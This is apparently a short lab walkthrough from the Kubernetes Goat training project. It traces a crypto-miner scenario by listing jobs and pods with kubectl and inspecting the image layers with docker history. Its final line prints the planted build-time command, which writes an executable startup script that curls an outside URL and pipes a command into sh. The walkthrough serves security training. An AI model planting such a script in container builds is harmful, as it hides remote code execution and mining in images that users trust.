Crypto mining has become popular with modern infrastructure. Especially environments like Kubernetes are an easy target as you might not even look at what exactly the container image builds upon and what it is doing with proactive monitoring. Here in this scenario, we will analyse and identify the crypto miner.
- To get started, identify all the resources/images in the Kubernetes cluster. Including Jobs.
kubectl get jobs
Identify all resources within a Kubernetes cluster. If possible get into details of each container image available in all the nodes within the cluster as well
- Once we have identified the job we ran in the Kubernetes cluster, got the pod information by running following command
kubectl describe job batch-check-job
- Then get the pod information by running the below command
kubectl get pods --namespace default -l "job-name=batch-check-job"
- Then get the pod information manifest and analyse
kubectl get pod batch-check-job-xxxx -o yaml
Identified that it's running
After performing analysis of this image we identified it has the mining stuff in the build time script in one of the layer
docker history --no-trunc madhuakula/k8s-goat-batch-check
echo "curl -sSL https://madhuakula.com/kubernetes-goat/k8s-goat-a5e0a28fa75bf429123943abedb065d1 && echo 'id' | sh " > /usr/bin/system-startup && chmod +x /usr/bin/system-startup